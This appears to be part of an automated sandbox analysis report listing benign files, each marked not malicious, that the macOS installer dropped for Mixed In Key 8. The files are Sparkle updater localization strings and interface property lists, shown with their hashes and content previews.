/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_YBybjs Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7816
Entropy (8bit):	3.3876168284286483
Encrypted:	false
SSDEEP:	96:M4aRt+yRM33iPvbeyhNIoIXIqIVMQDmxvfB0/nfgZTnr6brfvcJLNMMkHNjbY/hK:MM330vb1vKJonfUzo8JxkHPCGH423
MD5:	FB309D6AB1F647C7945D7069658C3B6B
SHA1:	F05906C297ACA56F31FC5C9192D7EAD60174DD19
SHA-256:	3B6362D508BD66CE2C53CA655351F39D2C9C8FF8653281A7B31BBC6B52D00CC5
SHA-512:	2658CF2FF773AA48A7714867C347AE69960DC8CBD7AB9C39992E1EB919047FA7603A25BB41713010CBD25BFA59C5B2F75E12589ACA76BB8988B01180636B3570
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .i.s. .g.e.d.o.w.n.l.o.a.d. .e.n. .i.s. .k.l.a.a.r. .v.o.o.r. .g.e.b.r.u.i.k.!. .W.i.l.t. .u. .%.1.$.@. .n.u. .i.n.s.t.a.l.l.e.r.e.n. .e.n. .h.e.r.s.t.a.r.t.e.n.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .n.i.e.t. .w.o.r.d.e.n. .g.e.u.p.d.a.t.e. .a.l.s. .h.e.t. .v.a.n. .e.e.n. .a.l.l.e.e.n.-.l.e.z.e.n. .v.o.l.u.m.e.,. .z.o.a.l.s. .e.e.n. .s.c.h.i.j.f.k.o.p.i.e. .o.f. .C.D.,. .g.e.o.p.e.n.d. .i.s... .V.e.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_ilL9gG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12107
Entropy (8bit):	6.737181430242566
Encrypted:	false
SSDEEP:	192:zK1WxX7QOLSjE0lTjeEYNMtKwC/4I+CIP5S/Cs7sK5wNCZ/scX/cAQZPgU36Aj1:zKgxX7QwSjE0NeEYNg7C/4I+CIPIKWsz
MD5:	D1C0F744A4AD30F88AEFF7B76E3A9512
SHA1:	AC6A057946F854A6F41809388F23631E11F17238
SHA-256:	B69A38BCBA4FFF20EFF2F4ED41E0B5A2E0C8A094E87BCA6686E1764434B67017
SHA-512:	33659A221066CDD79287585796FC47AEA1F2F9CE473ACFAB13B15BE0853AC356646B7BE971E9473313B2E950DA0EE12B5462E20062B3EF71C90717CDADD95135
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_Fm1Oh7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12192
Entropy (8bit):	6.721769592341197
Encrypted:	false
SSDEEP:	192:zK1WxXgQOLxjE0lTjeEYNMtKwC/4IOdYs7sK5wNCZ/scX/cAQZPdbBeSR4:zKgxXgQwxjE0NeEYNg7C/4IOdYWsfYXp
MD5:	1109B9125C7F6BC071E978AB18488BE6
SHA1:	E024F8B9384B5548F6EB34A8F435CD40F784F93B
SHA-256:	473C18CA21AF8E14457B08645ED436CE7B9AD8D730F10B08914194C21D51FA23
SHA-512:	66213C67E7C61934B68EB1940BAE45B1AFC1B4DCB523CFE16A9191EBCE1DC8310E764727675797BC2FBF7E1B21A9B253E7A4C5EC4DF1E118AED4DC3808C1535C
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_aZJmCB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15509
Entropy (8bit):	6.794361084474379
Encrypted:	false
SSDEEP:	384:RkgPpE0DeEYNg7uH4+R1C3MJtDyv1p+H2vONVUss:RkgPDeEYyK1C3MJq4Hv9s
MD5:	8F597D46334E60238911D7328F36FDD0
SHA1:	5B3B0756AF4F95AB71134B7F4D41201CF04A98A7
SHA-256:	4EAD5EAD48A626A61CCA695FDF5F49D08E382782C75EC092F48D7C55E8794278
SHA-512:	3E89B11D3614842BB26F247E4969EC2732019141AC62BCA13C2639A4F41E071365E5F0B48243AEA24780E3381DB767913D724A3B11FAF7DF3F2470ACC402EAE7
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys................. ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_nfy0La Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18313
Entropy (8bit):	6.829794508990958
Encrypted:	false
SSDEEP:	384:ZgUpE0DeEYNg7uH4+53NAKAswd17hPos1lybP8YU/8oWuSgB/4q:ZgUDeEYyZKAJRPlw4/8oBB/4q
MD5:	00C4DAF2E1ED8593422860F84352E3FC
SHA1:	07B08064F47E9C4B5F208D94527D9820B53B4471
SHA-256:	C04487D856E42EABB3428F48BA180187FB24C0793215B0628BE74A3192D0B8AC
SHA-512:	21812CF7025031ABD02F3A761691C06370BECD5E98761AF3B57D56E1E4A13267A43B7AFA1F3D4F856E4ADDEF46389679DC4DEC499EF010E5EFDE7AF7F6A4A507
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_zw2T83 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7582
Entropy (8bit):	3.5193891216678566
Encrypted:	false
SSDEEP:	192:BbK0PCaCDn3mTm01bopR+ypQlU+noddief5Iq:DPoI1b6+y+7odcpq
MD5:	9D4CA8C2C26C90F1105B820EE8EF789C
SHA1:	24165533106900CC2B59CC9CF9D804E8AE30BF76
SHA-256:	B7914349272B6432BBBFA03E2B729A0BEB52F1D43BC307C74FF51FADF8CADB9F
SHA-512:	6C941E3498FA620A2134FA034740323889D3CEBA0E69EC2EE93820F09DAF44A149DEBCDEE7C8B8720D2844359D753C90C40C8142E7878C83FF9BD627B9468940
Malicious:	false
Preview:	../.. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;. ../...".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .z.o.s.t.a.B. .p.o.b.r.a.n.y. .i. .j.e.s.t. .g.o.t.o.w.y. .d.o. .u.\|.y.c.i.a.!. .C.z.y. .c.h.c.i.a.B.b.y.[. .t.e.r.a.z. .z.a.i.n.s.t.a.l.o.w.a... .i. .p.o.n.o.w.n.i.e. .u.r.u.c.h.o.m.i... .%.1.$.@.?.".;...../.*. .".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_AkqsMs Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.794400510239076
Encrypted:	false
SSDEEP:	384:k7gDpE0DeEYNg7uH4+QC6JthGq+6cFqCXrLZm4AckySWR/c82d:k7gDDeEYydC6JzGKCXs4uEc82d
MD5:	5B93C5C2BCC2392372F32756FF27CA64
SHA1:	67036627DE9A4A1290C74F8142BC2135A3294A36
SHA-256:	E94A4A5AF05E08C5529503D53C7156AEACED93A6B71A8E8632A46BA6E2A14F24
SHA-512:	D15CBB6B6A38FDBADBBEAC91789327B25418129D0F5A323EDB83955E7827F95EAA128D45E66D235FF0C8A1CE4756E139BDB66EB5B4073A813252BE128C5F9D46
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].j.k.l.m.`.o.s.w.z.{...................................................................".-.0.1.9.:.;.G.J.K.S.T.U.j.n.r.s.u.v.w.}.......................................................................................................$.%.&.,.4.5.6.<.C.D.E.L.M.N.h.k.l.n.....e._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_Qm4Nft Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12159
Entropy (8bit):	6.724507402439369
Encrypted:	false
SSDEEP:	192:zK1WxXwQOLPjE0lTjeEYNMtKwC/4I0trnOs7sK5wNCZ/scX/cAQZPyg0IJ:zKgxXwQwPjE0NeEYNg7C/4I0trnOWsfL
MD5:	C321AE2DE936C4F21B2A8FD8DD6D83B2
SHA1:	D4E8DB0F7D336B4EE4531F11CB8CA1515AEE47AD
SHA-256:	29E553D45D347275E2C58C49A21793CD6F67F23C9AED8845CE69A69C1BAAA2ED
SHA-512:	9C927D27E52578A1E6BEBF8E0069F62641D4AB0A6284AE0F51C1F20B2076D6491182A9FE1819C6A12B6A63F2AB2488EF226EB1BAB0AD0977E4F643E316E87092
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_QwxH0h Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6380
Entropy (8bit):	3.431111657261911
Encrypted:	false
SSDEEP:	96:M4Osofat+NMs3DGiM37ZJT8mI7MI7ZdI7+I77gmoRngcjRn4d3d6LcvNsqHCgxxI:M+s3ytNOcujRn4d36QHVI
MD5:	7F5E6A38D91CBC6CEB79F865CDAC26AE
SHA1:	9B4FF3D04EC5C8A851F3C01113B92BC6505D7481
SHA-256:	EF4DABADC5B64C200A29275A0CBA77E4D35D663DE49F2A32133AFC6D590314A4
SHA-512:	A9B6703A27AE0358A9F87FB9F16F99943542EB64F3F1333583472BF7E91F6531D3BC054781DA369A33C6F87B9832F91012764F3C5A8CC4D5F7AA15552987B61B
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .f.o.i. .b.a.i.x.a.d.o. .e. .e.s.t... .p.r.o.n.t.o. .p.a.r.a. .u.s.o.!. .G.o.s.t.a.r.i.a. .d.e. .i.n.s.t.a.l.a.r. .e. .r.e.i.n.i.c.i.a.r. .o. .%.1.$.@. .a.g.o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n...o. .p.o.d.e. .s.e.r. .a.t.u.a.l.i.z.a.d.o. .e.n.q.u.a.n.t.o. .f.o.r. .e.x.e.c.u.t.a.d.o. .a. .p.a.r.t.i.r. .d.e. .u.m. .v.o.l.u.m.e. .s.o.m.e.n.t.e. .d.e. .l.e.i.t.u.r.a.,. .c.o.m.o. .u.m.a. .i.m.a.g.e.m.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_a5Lyy1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11205
Entropy (8bit):	6.714746770863015
Encrypted:	false
SSDEEP:	192:Ee1WI1xpDOT6E0lrjeEYNMtKwQN4kZ6LZ+qJU32dTN3tranG:Eeg2pD5E0ZeEYNg7QN406wqxddlT
MD5:	4FBF50B381C4D4201AB66013D825F381
SHA1:	6CC22D0EB590EFCEF7AFA0B4515310C5A1BB42FA
SHA-256:	359079BA8C4D87FC2CE73C3DEC9433AAF4D279ABDC847FE3FCAFD57CDA5AB3FA
SHA-512:	6C37FF4995F40DC0AEEF4000A8A2FBC0203799F6EB75A02F6CE24C9174DD203817DE375A753831E9A2031542B7185BF13F1DD2EC71A9A2F3FFE1F56CB12AACCD
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_hz6DmF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18550
Entropy (8bit):	6.781554139332877
Encrypted:	false
SSDEEP:	384:ilLgSpE0DeEYNg7uH4+5qRNAK6v4JI9WfMfBl0UyYDS63ql/pv3uwLCalk:4LgSDeEYyUK6YBIl0UZN3qlZ3PC/
MD5:	6DAF9CE560909D4BB817F931D99EBFAD
SHA1:	AB93D93CD37AD73339B4D54CC696B2DFF0B16DC1
SHA-256:	C6539769C0273589B977B40F28FF20166F5ECE7903FFEE7DD09A8C336D199577
SHA-512:	AA7DC14A92D2835BA414531A2DD47B24CBC7FF677964407274B82ED608F5E89013389D7316FE0506EE1A1A7AC782A7256496DE90A021E92EDE9CC6F31C35658F
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{.........................................................................$.%..,./.8.9.@.A.B.C.F.G.L.M.R.r.s.t.u...................................................................................$.*.+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.\|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_BvUddB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18577
Entropy (8bit):	6.77820719100543
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAsif17DGld871lwbP8YU/8oWuSgB/t0O/W:ZgZDeEYyZKAdRZlW4/8oBB/t0O/W
MD5:	D8066406614E41211BCC802023508908
SHA1:	C76BC9ABCEABE5B31FB49F19D01C7997B7A27F1D
SHA-256:	EDCF8265CDA33BF88DD7DA777F2BD0D0DE7EE8D1CB5F8F59509F6E84E0C3FA2F
SHA-512:	21E7D7CBC16B407437E2D3EDED91930514EB39B4B60FAF4BDA10A7F5E3BAC1A3F56E4DBB6D0FC650BABE35699A136FC57EA97FDBC95D6F19E6FD1A6336E637AF
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_Pq35rF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6702
Entropy (8bit):	3.4004754417747143
Encrypted:	false
SSDEEP:	96:M40AzPAt+yX3iGikMRu1zDcI7HXI7ZcXI7MXI7shkmoqugcj6nbdzO6rzvNnYMqM:MnX3l/FZvoj6nbdzXxYM9
MD5:	7544C7D52E0976AD3DFED89FAF6C4498
SHA1:	5A76559B637540B912285117AE80F15B041A11A2
SHA-256:	D5FC52E6F043BFE41F2318ED75FAF053A11839AD751484D9525CC9A4F0F23F7F
SHA-512:	EA43FDE854CD332935818DE378F11CD1C1F60404C1A6F0C03A85C4910BE9D756D555578567294F6447954D6B2076F4C6E38CF4A521DA87BE188FCEF4AF1BA4F5
Malicious:	false
